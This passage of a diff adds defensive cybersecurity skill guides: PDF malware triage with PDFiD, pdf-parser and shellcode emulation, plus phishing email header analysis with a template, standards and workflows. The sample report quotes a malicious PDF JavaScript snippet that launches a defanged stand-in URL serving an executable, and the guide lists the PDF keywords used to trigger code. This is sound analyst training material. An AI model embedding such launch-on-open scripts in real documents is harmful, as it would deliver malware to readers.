Result: SUCCESS
|
||||
|
||||
UNPACKED BINARY
|
||||
Sections: .text (entropy: 6.21) .rdata (entropy: 4.56) .data (entropy: 3.12) .rsrc (entropy: 3.45)
|
||||
Imports: 147 (kernel32, user32, advapi32, wininet, ws2_32)
|
||||
File Size: 245,760 bytes (2.5x expansion)
|
||||
OEP: 0x00401000
|
||||
|
||||
VALIDATION
|
||||
PE Valid: Yes
|
||||
Imports Resolved: Yes (147 functions across 8 DLLs)
|
||||
Executable: Yes (runs without crash in sandbox)
|
||||
|
||||
NEXT STEPS
|
||||
- Import unpacked.exe into Ghidra for full disassembly
|
||||
- Run YARA rules against unpacked binary
|
||||
- Submit unpacked binary to VirusTotal for improved detection
|
||||
```
|
||||
@@ -0,0 +1,341 @@
|
||||
---
|
||||
name: analyzing-pdf-malware-with-pdfid
|
||||
description: >
  Analyzes malicious PDF files using PDFiD, pdf-parser, and peepdf to identify embedded
  JavaScript, shellcode, exploits, and suspicious objects without opening the document.
  Determines the attack vector and extracts embedded payloads for further analysis.
  Activates for requests involving PDF malware analysis, malicious document analysis,
  PDF exploit investigation, or suspicious attachment triage.
|
||||
domain: cybersecurity
|
||||
subdomain: malware-analysis
|
||||
tags: [malware, PDF-analysis, document-malware, PDFiD, static-analysis]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing PDF Malware with PDFiD
|
||||
|
||||
## When to Use
|
||||
|
||||
- A suspicious PDF attachment has been flagged by email security or reported by a user
|
||||
- You need to determine if a PDF contains embedded JavaScript, shellcode, or exploit code
|
||||
- Triaging PDF documents before opening them in a sandbox or analysis environment
|
||||
- Extracting embedded executables, scripts, or URLs from malicious PDF objects
|
||||
- Analyzing PDF exploit kits targeting Adobe Reader or other PDF viewer vulnerabilities
|
||||
|
||||
**Do not use** for analyzing the rendered visual content of a PDF; this is for structural analysis of the PDF file format for malicious objects.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Python 3.8+ with Didier Stevens' PDF tools installed (`pip install pdfid pdf-parser`)
|
||||
- peepdf installed for interactive PDF analysis (`pip install peepdf`)
|
||||
- pdftotext from poppler-utils for extracting text content safely
|
||||
- YARA with PDF-specific rules for malware family identification
|
||||
- Isolated analysis VM without a PDF reader installed (prevent accidental opening)
|
||||
- CyberChef for decoding embedded Base64, hex, or deflate streams
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Initial Triage with PDFiD
|
||||
|
||||
Scan the PDF for suspicious keywords and structures:
|
||||
|
||||
```bash
|
||||
# Run PDFiD to identify suspicious elements
|
||||
pdfid suspect.pdf
|
||||
|
||||
# Expected output analysis:
|
||||
# /JS - JavaScript (HIGH risk)
|
||||
# /JavaScript - JavaScript object (HIGH risk)
|
||||
# /AA - Additional Actions, triggered by events such as page open (HIGH risk)
|
||||
# /OpenAction - Action on document open (HIGH risk)
|
||||
# /Launch - Launch external application (HIGH risk)
|
||||
# /EmbeddedFile - Embedded file (MEDIUM risk)
|
||||
# /RichMedia - Flash content (MEDIUM risk)
|
||||
# /ObjStm - Object stream (used for obfuscation)
|
||||
# /URI - URL reference (contextual risk)
|
||||
# /AcroForm - Interactive form (MEDIUM risk)
|
||||
|
||||
# Run with extra detail
|
||||
pdfid -e suspect.pdf
|
||||
|
||||
# Run with disarming (rename suspicious keywords)
|
||||
pdfid -d suspect.pdf
|
||||
```
|
||||
|
||||
```
|
||||
PDFiD Risk Assessment:
|
||||
━━━━━━━━━━━━━━━━━━━━━
|
||||
HIGH RISK indicators (any count > 0):
|
||||
/JS, /JavaScript -> Embedded JavaScript code
|
||||
/AA -> Additional Actions (can trigger on events without user interaction)
|
||||
/OpenAction -> Code runs when document is opened
|
||||
/Launch -> Can launch external executables
|
||||
/JBIG2Decode -> Associated with CVE-2009-0658 exploit
|
||||
|
||||
MEDIUM RISK indicators:
|
||||
/EmbeddedFile -> Contains embedded files (could be EXE/DLL)
|
||||
/RichMedia -> Flash/multimedia (Flash exploits)
|
||||
/AcroForm -> Form with possible submit action
|
||||
/XFA -> XML Forms Architecture (complex attack surface)
|
||||
|
||||
LOW RISK indicators:
|
||||
/ObjStm -> Object streams (obfuscation technique)
|
||||
/URI -> External URL references
|
||||
/Page -> Number of pages (context only)
|
||||
```
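
The risk tiers above can be applied mechanically once keyword counts are available. The following is a rough sketch of that classification, not a reimplementation of PDFiD: it counts keywords in the raw bytes only, so it will miss names hidden inside compressed object streams or obfuscated with `#xx` hex escapes, both of which PDFiD is designed to handle. The names `RISK_LEVELS`, `count_keywords`, and `highest_risk` are illustrative.

```python
import re

# Tiers copied from the risk assessment above
RISK_LEVELS = {
    "HIGH": ["/JS", "/JavaScript", "/AA", "/OpenAction", "/Launch", "/JBIG2Decode"],
    "MEDIUM": ["/EmbeddedFile", "/RichMedia", "/AcroForm", "/XFA"],
    "LOW": ["/ObjStm", "/URI"],
}


def count_keywords(data: bytes) -> dict:
    """Count occurrences of each tracked PDF name in the raw file bytes."""
    counts = {}
    for names in RISK_LEVELS.values():
        for name in names:
            # The lookahead stops "/JS" from matching a longer name such as "/JSX"
            pattern = re.escape(name.encode()) + rb"(?![A-Za-z0-9])"
            counts[name] = len(re.findall(pattern, data))
    return counts


def highest_risk(counts: dict) -> str:
    """Return the highest tier that has at least one keyword present."""
    for level in ("HIGH", "MEDIUM", "LOW"):
        if any(counts[name] for name in RISK_LEVELS[level]):
            return level
    return "NONE"


# Hypothetical fragment for illustration
sample = b"<< /Type /Catalog /OpenAction 5 0 R >> << /S /JavaScript /JS (app.alert(1)) >>"
print(highest_risk(count_keywords(sample)))
```

A result of `NONE` from this sketch is not evidence of a clean file; treat it as a prompt to run the real tools.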
|
||||
|
||||
### Step 2: Parse PDF Structure with pdf-parser
|
||||
|
||||
Examine suspicious objects identified by PDFiD:
|
||||
|
||||
```bash
|
||||
# List all objects referencing JavaScript
|
||||
pdf-parser --search "/JavaScript" suspect.pdf
|
||||
pdf-parser --search "/JS" suspect.pdf
|
||||
|
||||
# List all objects with OpenAction
|
||||
pdf-parser --search "/OpenAction" suspect.pdf
|
||||
|
||||
# Extract a specific object by ID (example: object 5)
|
||||
pdf-parser --object 5 suspect.pdf
|
||||
|
||||
# Extract and decompress stream content
|
||||
pdf-parser --object 5 --filter --raw suspect.pdf
|
||||
|
||||
# Search for embedded files
|
||||
pdf-parser --search "/EmbeddedFile" suspect.pdf
|
||||
|
||||
# List all objects with their types
|
||||
pdf-parser --stats suspect.pdf
|
||||
```
|
||||
|
||||
### Step 3: Extract and Analyze Embedded JavaScript
|
||||
|
||||
Pull out JavaScript code from PDF objects:
|
||||
|
||||
```bash
|
||||
# Extract JavaScript using pdf-parser
|
||||
pdf-parser --search "/JS" --raw --filter suspect.pdf > extracted_js.txt
|
||||
|
||||
# Alternative: Use peepdf for interactive JavaScript extraction
|
||||
peepdf -f -i suspect.pdf << 'EOF'
|
||||
js_analyse
|
||||
EOF
|
||||
|
||||
# peepdf interactive commands for JS analysis:
|
||||
# js_analyse - Extract and show all JavaScript code
|
||||
# js_beautify - Format extracted JavaScript
|
||||
# js_eval <object> - Evaluate JavaScript in sandboxed environment
|
||||
# object <id> - Display object content
|
||||
# rawobject <id> - Display raw object bytes
|
||||
# stream <id> - Display decompressed stream
|
||||
# offsets - Show object offsets in file
|
||||
```
|
||||
|
||||
```python
|
||||
# Python script for comprehensive PDF JavaScript extraction
import subprocess
import re

# Find object IDs containing JavaScript references.
# "pdf-parser --search" prints each matching object under an "obj <id> <gen>" header line.
js_objects = set()
for keyword in ("/JavaScript", "/JS"):
    result = subprocess.run(
        ["pdf-parser", "--search", keyword, "suspect.pdf"],
        capture_output=True, text=True, errors="replace"
    )
    js_objects.update(re.findall(r'^obj (\d+) \d+', result.stdout, re.MULTILINE))

# Extract each JavaScript-containing object
for obj_id in sorted(js_objects, key=int):
    result = subprocess.run(
        ["pdf-parser", "--object", obj_id, "--filter", "--raw", "suspect.pdf"],
        capture_output=True, text=True, errors="replace"
    )
    print(f"\n=== Object {obj_id} ===")
    print(result.stdout[:2000])
|
||||
```
|
||||
|
||||
### Step 4: Analyze Embedded Shellcode
|
||||
|
||||
Extract and examine shellcode from PDF exploits:
|
||||
|
||||
```bash
|
||||
# Extract raw stream data for shellcode analysis
|
||||
pdf-parser --object 7 --filter --raw --dump shellcode.bin suspect.pdf
|
||||
|
||||
# Analyze shellcode with scdbg (shellcode debugger)
|
||||
scdbg /f shellcode.bin
|
||||
|
||||
# Alternative: Use speakeasy for shellcode emulation
|
||||
python3 -c "
import speakeasy

se = speakeasy.Speakeasy()
sc_addr = se.load_shellcode('shellcode.bin', arch='x86')
se.run_shellcode(sc_addr)

# Review API calls made by shellcode
# (report layout may differ between Speakeasy versions; adjust the keys if needed)
for entry_point in se.get_report()['entry_points']:
    for call in entry_point.get('apis', []):
        print(f\"{call['api_name']}: {call['args']}\")
"
|
||||
|
||||
# Use CyberChef to decode hex/base64 encoded shellcode
|
||||
# Input: Extracted stream data
|
||||
# Recipe: From Hex -> Disassemble x86
|
||||
```
|
||||
|
||||
### Step 5: Extract Embedded Files and URLs
|
||||
|
||||
Pull out embedded executables and linked resources:
|
||||
|
||||
```python
|
||||
# Extract embedded files from PDF
import hashlib
import re
import subprocess

# Find embedded file objects
result = subprocess.run(
    ["pdf-parser", "--search", "/EmbeddedFile", "--raw", "--filter", "suspect.pdf"],
    capture_output=True
)

# Extract embedded PE files by searching for MZ header.
# A raw scan only finds uncompressed payloads; dump compressed streams
# with pdf-parser first and scan the dumped data the same way.
with open("suspect.pdf", "rb") as f:
    data = f.read()

# Search for embedded PE files
offset = 0
while True:
    pos = data.find(b'MZ', offset)
    if pos == -1:
        break
    # Verify PE signature
    if pos + 0x40 <= len(data):
        pe_offset = int.from_bytes(data[pos+0x3C:pos+0x40], 'little')
        if data[pos+pe_offset:pos+pe_offset+4] == b'PE\x00\x00':
            print(f"Embedded PE found at offset 0x{pos:X}")
            # Extract (estimate size or use PE header)
            embedded = data[pos:pos+100000]  # Initial extraction
            sha256 = hashlib.sha256(embedded).hexdigest()
            with open(f"embedded_{pos:X}.exe", "wb") as out:
                out.write(embedded)
            print(f"  SHA-256: {sha256}")
    offset = pos + 1

# Extract URLs from PDF
result = subprocess.run(
    ["pdf-parser", "--search", "/URI", "--raw", "suspect.pdf"],
    capture_output=True, text=True, errors="replace"
)
urls = re.findall(r'(https?://[^\s<>"]+)', result.stdout)
for url in set(urls):
    print(f"URL: {url}")
|
||||
```
|
||||
|
||||
### Step 6: Generate Analysis Report
|
||||
|
||||
Document all findings from the PDF analysis:
|
||||
|
||||
```
|
||||
Analysis should cover:
|
||||
- PDFiD triage results (suspicious keyword counts)
|
||||
- PDF structure anomalies (object streams, cross-reference issues)
|
||||
- Extracted JavaScript code (deobfuscated if needed)
|
||||
- Shellcode analysis results (API calls, network indicators)
|
||||
- Embedded files extracted with hashes
|
||||
- URLs and external references
|
||||
- CVE identification if a known exploit is detected
|
||||
- YARA rule matches against known PDF malware families
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|------|------------|
| **PDF Object** | Basic building block of a PDF file; objects can contain streams (compressed data), dictionaries, arrays, and references to other objects |
| **OpenAction** | PDF dictionary entry specifying an action to execute when the document is opened; commonly used to trigger JavaScript exploits |
| **PDF Stream** | Compressed data within a PDF object that can contain JavaScript, images, embedded files, or shellcode; typically FlateDecode compressed |
| **FlateDecode** | Zlib/deflate compression filter applied to PDF streams; must be decompressed to analyze contents |
| **ObjStm (Object Stream)** | PDF feature storing multiple objects within a single compressed stream; used by malware to hide suspicious objects from simple parsers |
| **JBIG2** | Image compression standard in PDFs; historical source of exploits (CVE-2009-0658, CVE-2021-30860 FORCEDENTRY) |
| **PDF JavaScript API** | Adobe-specific JavaScript extensions available in PDF documents for form manipulation, network access, and OS interaction |
|
||||
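
To make the stream filters concrete, here is a small sketch that decodes FlateDecode and ASCIIHexDecode data with the standard library, assuming the raw stream bytes have already been carved out of the object (for example with `pdf-parser --raw`). The function names are illustrative, and other filters such as ASCII85Decode or LZWDecode are not covered.

```python
import binascii
import zlib


def decode_flate(stream: bytes) -> bytes:
    """FlateDecode is zlib/deflate, so zlib can decompress it directly."""
    return zlib.decompress(stream)


def decode_ascii_hex(stream: bytes) -> bytes:
    """ASCIIHexDecode: hex digits, whitespace ignored, terminated by '>'."""
    hex_digits = b"".join(stream.split(b">")[0].split())
    if len(hex_digits) % 2:
        hex_digits += b"0"  # an odd final digit is treated as if followed by 0
    return binascii.unhexlify(hex_digits)


def apply_filters(stream: bytes, filters: list) -> bytes:
    """Apply filters in the order they appear in the stream's /Filter array."""
    decoders = {"/FlateDecode": decode_flate, "/ASCIIHexDecode": decode_ascii_hex}
    for name in filters:
        stream = decoders[name](stream)
    return stream


# Hypothetical stream encoded with two chained filters
script = b"app.alert('x');"
encoded = binascii.hexlify(zlib.compress(script)) + b">"
print(apply_filters(encoded, ["/ASCIIHexDecode", "/FlateDecode"]))
```

Chained filters are a common obfuscation layer, so always check whether `/Filter` is a single name or an array.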
|
||||
## Tools & Systems
|
||||
|
||||
- **PDFiD**: Didier Stevens' tool for scanning PDF documents for suspicious keywords and structures without parsing the full document
|
||||
- **pdf-parser**: Companion tool to PDFiD for detailed PDF object extraction, stream decompression, and content analysis
|
||||
- **peepdf**: Python-based PDF analysis tool providing interactive shell for object inspection and JavaScript extraction
|
||||
- **QPDF**: PDF transformation tool for linearizing, decrypting, and restructuring PDFs for easier analysis
|
||||
- **scdbg**: Shellcode analysis tool that emulates x86 shellcode execution and logs API calls
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Triaging a Phishing PDF with Embedded JavaScript
|
||||
|
||||
**Context**: Email gateway flagged a PDF attachment with suspicious JavaScript indicators. The security team needs to determine if it contains an exploit or a social engineering redirect.
|
||||
|
||||
**Approach**:
|
||||
1. Run PDFiD to confirm /JS, /JavaScript, and /OpenAction presence and counts
|
||||
2. Use pdf-parser to extract the OpenAction object and follow its reference chain
|
||||
3. Extract the JavaScript code from the referenced stream object (apply FlateDecode filter)
|
||||
4. Deobfuscate the JavaScript (decode hex strings, resolve eval chains)
|
||||
5. Determine if the script exploits a PDF reader vulnerability (check for heap spray, ROP chains) or performs a redirect
|
||||
6. Extract all URLs, IPs, and embedded files as IOCs
|
||||
7. Classify the sample: exploit (specific CVE) or social engineering (redirect/phishing)
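
Step 4 of the approach often starts with `unescape()` layers like the one shown in the Output Format section. As a minimal sketch, the percent-encoded arguments can be decoded offline in Python rather than by evaluating the script; `js_unescape` and `decode_unescape_payloads` are illustrative names, and the regex only handles simple quoted string literals.

```python
import re
from urllib.parse import unquote

# Matches unescape("...") or unescape('...') with a plain string literal argument
UNESCAPE_CALL = re.compile(r'unescape\(\s*["\']([^"\']*)["\']\s*\)')


def js_unescape(text: str) -> str:
    """Approximate JavaScript unescape(): handles %uXXXX and %XX sequences."""
    text = re.sub(r"%u([0-9A-Fa-f]{4})", lambda m: chr(int(m.group(1), 16)), text)
    # latin-1 maps each %XX byte to the code point with the same value
    return unquote(text, encoding="latin-1")


def decode_unescape_payloads(script: str) -> list:
    """Return the decoded argument of every unescape("...") call in the script."""
    return [js_unescape(arg) for arg in UNESCAPE_CALL.findall(script)]


print(decode_unescape_payloads('eval(unescape("%68%65%6C%6C%6F"))'))
```

Repeat the decode on each result until no further `unescape` or `eval` layers remain; `%u` sequences that decode to non-printable characters are a common sign of shellcode or heap-spray data.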
|
||||
|
||||
**Pitfalls**:
|
||||
- Opening the PDF in a standard reader instead of analyzing it with command-line tools
|
||||
- Missing JavaScript hidden inside Object Streams (/ObjStm) that PDFiD detects but simple parsers miss
|
||||
- Not decompressing streams before analysis (FlateDecode, ASCIIHexDecode, ASCII85Decode filters)
|
||||
- Assuming the absence of /JS means no JavaScript; code can be embedded in form fields (/AcroForm with /XFA)
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
PDF MALWARE ANALYSIS REPORT
|
||||
==============================
|
||||
File: invoice_2025.pdf
|
||||
SHA-256: e3b0c44298fc1c149afbf4c8996fb924...
|
||||
File Size: 45,312 bytes
|
||||
PDF Version: 1.7
|
||||
|
||||
PDFID TRIAGE
|
||||
/JS: 1 [HIGH RISK]
|
||||
/JavaScript: 1 [HIGH RISK]
|
||||
/OpenAction: 1 [HIGH RISK]
|
||||
/EmbeddedFile: 0
|
||||
/Launch: 0
|
||||
/URI: 2
|
||||
/Page: 1
|
||||
/ObjStm: 1 [OBFUSCATION]
|
||||
|
||||
SUSPICIOUS OBJECTS
|
||||
Object 5: /OpenAction -> references Object 8
|
||||
Object 8: /JavaScript stream (FlateDecode, 2,847 bytes decompressed)
|
||||
Object 12: /ObjStm containing objects 15-18
|
||||
|
||||
EXTRACTED JAVASCRIPT
|
||||
Layer 1: eval(unescape("%68%65%6C%6C%6F"))
|
||||
Layer 2: var url = "hxxp://malicious[.]com/payload.exe";
|
||||
app.launchURL(url, true);
|
||||
// Social engineering redirect, not exploit
|
||||
|
||||
EXTRACTED IOCs
|
||||
URLs: hxxp://malicious[.]com/payload.exe
|
||||
hxxps://fake-login[.]com/adobe/verify
|
||||
Domains: malicious[.]com, fake-login[.]com
|
||||
|
||||
CLASSIFICATION
|
||||
Type: Social Engineering (URL redirect)
|
||||
CVE: None (no exploit code detected)
|
||||
Risk: HIGH (downloads executable payload)
|
||||
Family: Generic PDF Dropper
|
||||
```
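
The IOCs in the report are defanged (`hxxp`, `[.]`) so they cannot be clicked or auto-linked by accident. A small sketch of that convention, with `defang` as an illustrative helper name:

```python
def defang(indicator: str) -> str:
    """Defang a URL, domain, or IP address for safe inclusion in a report."""
    scheme, sep, rest = indicator.partition("://")
    if not sep:
        # Bare domain or IP address: only the dots need neutralising
        return indicator.replace(".", "[.]")
    host, slash, path = rest.partition("/")
    scheme = scheme.lower().replace("http", "hxxp")
    # Only the host part is bracketed, matching the report format above
    return f"{scheme}://{host.replace('.', '[.]')}{slash}{path}"


for ioc in ["http://malicious.com/payload.exe", "fake-login.com"]:
    print(defang(ioc))
```

Keep the original, unmodified indicators in a machine-readable file alongside the report so they can still be loaded into blocklists and threat intelligence platforms.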
|
||||
@@ -0,0 +1,78 @@
|
||||
---
|
||||
name: analyzing-phishing-email-headers
|
||||
description: Email headers contain critical metadata that reveals the true origin, routing path, and authentication status of emails. Analyzing these headers is a foundational skill for identifying phishing attempts, verifying sender authenticity, and gathering threat intelligence.
|
||||
domain: cybersecurity
|
||||
subdomain: phishing-defense
|
||||
tags: [phishing, email-security, social-engineering, dmarc, awareness, header-analysis, forensics]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
# Analyzing Phishing Email Headers
|
||||
|
||||
## Overview
|
||||
Email headers contain critical metadata that reveals the true origin, routing path, and authentication status of emails. Analyzing these headers is a foundational skill for identifying phishing attempts, verifying sender authenticity, and gathering threat intelligence. This skill covers systematic extraction and interpretation of email headers using both manual techniques and automated tools.
|
||||
|
||||
## Prerequisites
|
||||
- Basic understanding of SMTP protocol and email delivery
|
||||
- Familiarity with DNS records (MX, TXT, SPF, DKIM, DMARC)
|
||||
- Python 3.8+ installed
|
||||
- Access to email client that can export raw headers (Outlook, Gmail, Thunderbird)
|
||||
|
||||
## Key Concepts
|
||||
|
||||
### Critical Header Fields
|
||||
1. **Received**: Chain of mail servers the message passed through (read bottom to top)
|
||||
2. **From / Return-Path / Reply-To**: Sender identity fields (often spoofed)
|
||||
3. **Authentication-Results**: SPF, DKIM, DMARC verification outcomes
|
||||
4. **X-Originating-IP**: Original sender IP address
|
||||
5. **Message-ID**: Unique identifier; anomalies indicate spoofing
|
||||
6. **X-Mailer / User-Agent**: Email client used to compose the message
|
||||
|
||||
### Red Flags in Headers
|
||||
- Mismatched `From` and `Return-Path` domains
|
||||
- SPF/DKIM/DMARC failures in `Authentication-Results`
|
||||
- Suspicious `Received` chains with unfamiliar relay servers
|
||||
- `X-Originating-IP` from unexpected geographies
|
||||
- Missing or malformed `Message-ID`
|
||||
- Unusual `X-Mailer` values (e.g., mass-mailing tools)
|
||||
|
||||
## Implementation Steps
|
||||
|
||||
### Step 1: Extract Raw Email Headers
|
||||
```
|
||||
Gmail: Open email -> Three dots -> "Show original"
|
||||
Outlook: Open email -> File -> Properties -> Internet Headers
|
||||
Thunderbird: View -> Message Source (Ctrl+U)
|
||||
```
|
||||
|
||||
### Step 2: Parse Headers with Python
|
||||
Use the `scripts/process.py` script to automate header analysis including IP geolocation, authentication validation, and anomaly detection.
|
||||
|
||||
### Step 3: Validate Authentication Chain
|
||||
- Check SPF alignment: Does the sending IP match the domain's SPF record?
|
||||
- Check DKIM signature: Is the cryptographic signature valid?
|
||||
- Check DMARC policy: Does the message pass DMARC alignment?
|
||||
|
||||
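As a rough illustration of the alignment question in Step 3, the sketch below compares the `From` domain with the SPF-authenticated (`smtp.mailfrom`) and DKIM-signing (`header.d`) domains. The function names `org_domain` and `dmarc_aligned` are hypothetical, and the organizational-domain logic is a deliberate simplification: it keeps only the last two DNS labels, whereas a production check would consult the Public Suffix List.

```python
def org_domain(value: str) -> str:
    """Naive organizational domain: last two DNS labels (assumption: no Public Suffix List)."""
    domain = value.rsplit("@", 1)[-1]          # accept either a domain or a full address
    labels = domain.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def dmarc_aligned(from_domain: str, spf_result: str, spf_domain: str,
                  dkim_result: str, dkim_domain: str) -> bool:
    """Relaxed-mode sketch: a passing SPF or DKIM identity must share the From org domain."""
    target = org_domain(from_domain)
    spf_ok = spf_result == "pass" and org_domain(spf_domain) == target
    dkim_ok = dkim_result == "pass" and org_domain(dkim_domain) == target
    return spf_ok or dkim_ok


# SPF passes only for the bulk sender's own domain, but DKIM is signed by the From domain.
print(dmarc_aligned("example.com", "pass", "bounce.mailer.net", "pass", "mail.example.com"))
# Both mechanisms pass, yet neither identity belongs to the From domain.
print(dmarc_aligned("example.com", "pass", "attacker.net", "pass", "attacker.net"))
```

The second case is the one worth remembering: `spf=pass` and `dkim=pass` on their own say nothing about the visible `From` address unless one of the authenticated domains aligns with it.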
### Step 4: Trace Mail Route
- Read `Received` headers from bottom to top
- Map each hop's IP to organization/location
- Identify unexpected relays or delays

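To make the "delays" check in Step 4 concrete, here is a minimal sketch that computes the time gap between consecutive hops using only the standard library. The helper name `hop_delays` and the sample headers are illustrative assumptions; it also assumes every `Received` value ends with a well-formed date after the last semicolon, which real-world mail does not always guarantee.

```python
from email.utils import parsedate_to_datetime
from typing import List


def hop_delays(received_headers: List[str]) -> List[float]:
    """Return seconds elapsed between consecutive hops, oldest hop first."""
    stamps = []
    # Received headers are prepended by each server, so reverse for chronological order.
    for header in reversed(received_headers):
        # The timestamp follows the last semicolon of a Received header.
        date_part = header.rsplit(";", 1)[-1].strip()
        stamps.append(parsedate_to_datetime(date_part))
    return [(later - earlier).total_seconds()
            for earlier, later in zip(stamps, stamps[1:])]


# Hypothetical headers in the order they appear in the message (newest first).
sample = [
    "from mx.example.org by mail.example.com with ESMTP; Mon, 01 Jan 2024 10:00:45 +0000",
    "from relay.example.net by mx.example.org with ESMTP; Mon, 01 Jan 2024 10:00:05 +0000",
    "from client.example.net by relay.example.net with ESMTP; Mon, 01 Jan 2024 05:00:00 -0500",
]
print(hop_delays(sample))
```

Negative values or gaps of several hours are worth a closer look, although clock skew between servers can produce small negative deltas on perfectly legitimate mail.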
### Step 5: Correlate with Threat Intelligence
- Look up originating IP on AbuseIPDB, VirusTotal
- Check sending domain age on WHOIS
- Search for known phishing infrastructure patterns

## Tools & Resources
- **MXToolbox Header Analyzer**: https://mxtoolbox.com/EmailHeaders.aspx
- **Google Admin Toolbox**: https://toolbox.googleapps.com/apps/messageheader/
- **AbuseIPDB**: https://www.abuseipdb.com/
- **VirusTotal**: https://www.virustotal.com/
- **PhishTank**: https://phishtank.org/

## Validation
- Successfully parse headers from 3 different email providers
- Correctly identify authentication pass/fail status
- Accurately trace email routing path
- Detect at least 3 phishing indicators in a sample phishing email
@@ -0,0 +1,86 @@
# Phishing Email Header Analysis Report Template

## Report Information
- **Analyst**: [Name]
- **Date**: [YYYY-MM-DD]
- **Case ID**: [CASE-XXXX]
- **Classification**: [Phishing / Spear-phishing / BEC / Legitimate]

## Email Summary
| Field | Value |
|---|---|
| From | |
| To | |
| Subject | |
| Date Received | |
| Message-ID | |

## Authentication Results
| Check | Result | Domain | Notes |
|---|---|---|---|
| SPF | pass/fail/none | | |
| DKIM | pass/fail/none | | |
| DMARC | pass/fail/none | | |

## Sender Analysis
| Field | Value | Match From? |
|---|---|---|
| From (header) | | N/A |
| Return-Path (envelope) | | Yes/No |
| Reply-To | | Yes/No |
| X-Originating-IP | | |
| X-Mailer | | |

## Routing Analysis
| Hop | Server From | Server By | IP | Location | Time |
|---|---|---|---|---|---|
| 1 | | | | | |
| 2 | | | | | |
| 3 | | | | | |

## Indicators of Compromise (IOCs)
### IP Addresses
| IP | Source | Reputation | Location |
|---|---|---|---|
| | | | |

### Domains
| Domain | Source | Age | Reputation |
|---|---|---|---|
| | | | |

### URLs
| URL | Context | Status |
|---|---|---|
| | | |

## Phishing Indicators Found
| # | Category | Description | Severity |
|---|---|---|---|
| 1 | | | |
| 2 | | | |
| 3 | | | |

## Risk Assessment
- **Risk Score**: [0-100]
- **Risk Level**: [CLEAN / LOW / MEDIUM / HIGH / CRITICAL]
- **Confidence**: [Low / Medium / High]

## Recommended Actions
- [ ] Block sender domain at email gateway
- [ ] Add originating IP to blocklist
- [ ] Submit IOCs to threat intelligence platform
- [ ] Notify affected users
- [ ] Check for similar messages in mail logs
- [ ] Update email filtering rules
- [ ] Report to anti-phishing databases (PhishTank, APWG)

## Evidence Chain
| Item | Hash (SHA-256) | Description |
|---|---|---|
| Original .eml | | Raw email file |
| Headers export | | Extracted headers |
| Screenshots | | Visual evidence |

## Notes
[Additional observations, context, or analysis notes]
@@ -0,0 +1,42 @@
# Standards & References: Analyzing Phishing Email Headers

## RFC Standards
- **RFC 5321 (SMTP)**: Simple Mail Transfer Protocol - defines how email is transmitted and the structure of Received headers
- **RFC 5322 (Internet Message Format)**: Defines the syntax of email header fields including From, To, Date, Message-ID
- **RFC 7208 (SPF)**: Sender Policy Framework - mechanism for validating email sender IP against domain policy
- **RFC 6376 (DKIM)**: DomainKeys Identified Mail - cryptographic authentication of email messages
- **RFC 7489 (DMARC)**: Domain-based Message Authentication, Reporting and Conformance
- **RFC 8601 (Authentication-Results)**: Message Header Field for Indicating Message Authentication Status

## NIST Guidelines
- **NIST SP 800-177 Rev.1**: Trustworthy Email - comprehensive guide to email security including header authentication
- **NIST SP 800-45 Ver.2**: Guidelines on Electronic Mail Security

## MITRE ATT&CK References
- **T1566.001**: Phishing: Spearphishing Attachment
- **T1566.002**: Phishing: Spearphishing Link
- **T1566.003**: Phishing: Spearphishing via Service
- **T1534**: Internal Spearphishing

## Industry Standards
- **M3AAWG Best Practices**: Messaging, Malware and Mobile Anti-Abuse Working Group email authentication recommendations
- **DMARC.org**: Industry consortium for DMARC deployment guidance
- **Anti-Phishing Working Group (APWG)**: Phishing Activity Trends Reports

## Key Header Fields Reference

| Header Field | RFC | Purpose |
|---|---|---|
| Received | RFC 5321 | Records each SMTP hop |
| From | RFC 5322 | Display sender address |
| Return-Path | RFC 5321 | Envelope sender (bounce address) |
| Authentication-Results | RFC 8601 | SPF/DKIM/DMARC results |
| DKIM-Signature | RFC 6376 | Cryptographic signature |
| Message-ID | RFC 5322 | Unique message identifier |
| X-Originating-IP | Non-standard | Sender's IP (provider-specific) |
| X-Mailer | Non-standard | Email client identification |

## Compliance Frameworks
- **PCI DSS 4.0**: Requirement 5 - Protect All Systems and Networks from Malicious Software
- **ISO 27001:2022**: A.8.23 - Web filtering; A.5.14 - Information transfer
- **SOC 2**: CC6.1 - Logical and Physical Access Controls
@@ -0,0 +1,89 @@
# Workflows: Analyzing Phishing Email Headers

## Workflow 1: Rapid Header Triage

```
START: Suspicious email reported
    |
    v
[Extract raw headers from email client]
    |
    v
[Check Authentication-Results header]
    |
    +-- SPF=pass, DKIM=pass, DMARC=pass --> Lower suspicion, check content
    |
    +-- Any FAIL --> High suspicion
    |
    v
[Compare From vs Return-Path vs Reply-To]
    |
    +-- All match --> Check Received chain
    +-- Mismatch --> LIKELY PHISHING - escalate
    |
    v
[Document findings, block sender, alert SOC]
```

## Workflow 2: Full Header Forensic Analysis

### Phase 1: Collection
1. Obtain raw email source (.eml file or copy full headers)
2. Preserve original message with headers as evidence
3. Calculate hash of original .eml file for chain of custody

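The hashing step in Phase 1 can be sketched with the standard library alone. The helper name `sha256_of_file` and the chunk size are illustrative choices; the point is to hash the untouched bytes of the `.eml` file rather than any decoded or re-serialized text, so that the digest can be reproduced later from the preserved evidence.

```python
import hashlib


def sha256_of_file(path: str, chunk_size: int = 65536) -> str:
    """Return the SHA-256 hex digest of a file, read in fixed-size chunks."""
    digest = hashlib.sha256()
    with open(path, "rb") as handle:
        # iter() with a sentinel keeps reading until read() returns b"" at end of file.
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()
```

Calling `sha256_of_file("suspicious_email.eml")` (a placeholder path) yields the value to record in the report's Evidence Chain table. Record it before opening the message in any tool that might rewrite the file.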
### Phase 2: Authentication Analysis
1. Extract SPF result from Authentication-Results
2. Verify SPF by querying the TXT record of the envelope sender domain and looking for the `v=spf1` entry: `dig +short TXT example.com`
3. Extract DKIM result and verify signature domain
4. Check DMARC alignment (identifier alignment between SPF/DKIM and From domain)
5. Document all authentication pass/fail results

### Phase 3: Route Analysis
1. Parse all Received headers (bottom to top)
2. For each hop:
   - Extract server hostname and IP
   - Note timestamp
